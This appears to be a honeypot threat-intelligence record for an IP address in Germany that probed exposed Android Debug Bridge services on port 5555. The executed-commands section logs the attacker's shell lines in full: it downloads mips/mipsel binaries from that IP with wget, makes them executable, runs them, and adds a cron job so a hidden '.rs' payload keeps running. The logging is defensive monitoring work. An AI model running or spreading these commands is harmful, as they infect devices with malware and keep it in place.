Active Threat • LOW
176.65.132.53
Country of Origin🇩🇪 Germany
First Detection5/4/2026
Last Activity5/5/2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
27
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
0
Malware
Geolocation
- Country
- 🇩🇪 Germany
- City
- Unknown
- ASN
- AS51396
- ISP
- Pfcloud UG (haftungsbeschrankt)
Attack Types
adb_honeypot
Attacked Ports
5555
Associated Malware
No associated malware
Executed Commands
$
uname -m6x$
getprop ro.product.cpu.abi 2>/dev/null4x$
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.65.132.53/mips; chmod 777 mips; ./mips; rm -rf mips; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.65.132.53/mipsel; chmod 777 mipsel; ./mipsel; rm -rf mipsel4x$
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.65.132.53:9111/mips -O .rs; chmod 777 .rs; nohup ./.rs >/dev/null 2>&1 & echo '*/5 * * * * cd /tmp && ./.rs >/dev/null 2>&1' > /tmp/cron; crontab /tmp/cron 2>/dev/null || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.65.132.53:9111/mipsel -O .rs; chmod 777 .rs; nohup ./.rs >/dev/null 2>&1 & echo '*/5 * * * * cd /tmp && ./.rs >/dev/null 2>&1' > /tmp/cron; crontab /tmp/cron 2>/dev/null2xRisk Assessment
15
/100
LowMediumHighCritical